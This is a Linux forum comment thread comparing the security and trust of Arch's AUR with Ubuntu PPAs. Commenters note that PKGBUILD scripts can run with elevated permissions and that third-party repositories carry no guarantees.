this post was submitted on 09 Sep 2024
122 points (95.5% liked)

Linux

48314 readers
99 users here now

From Wikipedia, the free encyclopedia

Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991 by Linus Torvalds. Linux is typically packaged in a Linux distribution (or distro for short).

Distributions include the Linux kernel and supporting system software and libraries, many of which are provided by the GNU Project. Many Linux distributions use the word "Linux" in their name, but the Free Software Foundation uses the name GNU/Linux to emphasize the importance of GNU software, causing some controversy.

Rules

Related Communities

Community icon by Alpár-Etele Méder, licensed under CC BY 3.0

founded 5 years ago
MODERATORS
 

During the first impressions of said distro, what feature surprised you the most?

you are viewing a single comment's thread
view the rest of the comments
[–] [email protected] 1 points 2 months ago (2 children)

Isn't installing from the AUR equivalent to installing from a PPA, in terms of security and trust?

[–] [email protected] 10 points 2 months ago (2 children)

Almost. But with one key difference. PPAs are precompiled binaries where you cannot inspect the source - you have to trust the maintainer of the PPA. AUR is a repository of source packages which you can download and inspect yourself (or hope others have done this). This makes AUR more community focused than PPAs I feel. AUR is also a central repo managed by people that dont own the vast majority of the packages hosted on it and where packages can be taken down if found malicious. PPAs are lots of separate repositories all managed by different people that generally maintain all the packages for their PPA.

Though in both cases anyone can upload anything to them, so they are not 100% trustworthy. But I do think the way AUR works puts them ahead of PPAs.

[–] sga 3 points 2 months ago (1 children)

there is one more thing - unless you are using something like chaotic aur, or a very popular package, please pay attention to PKGBUILDS. These are essentially bash scripts which can (depending on your package manager) will run with highest permissions. They can do anything

[–] [email protected] 3 points 2 months ago

They also may not compile stuff from source, they can download and install binaries and some AUR packages do exactly that.

There's zero guarantee when using AUR. It's not supported by Arch for a reason.

[–] [email protected] 1 points 2 months ago

Also you can't just install these packages, you have to import the keyrings of any packages that access the kernel. That requires you to go to the website, check out the owner of the key, see their contributions and decide for yourself if you trust it

[–] [email protected] 2 points 2 months ago* (last edited 2 months ago)

There no security and trust when it comes to 3rd-party repos. There can be anything in there. Neither the AUR nor PPAs come with any guarantees.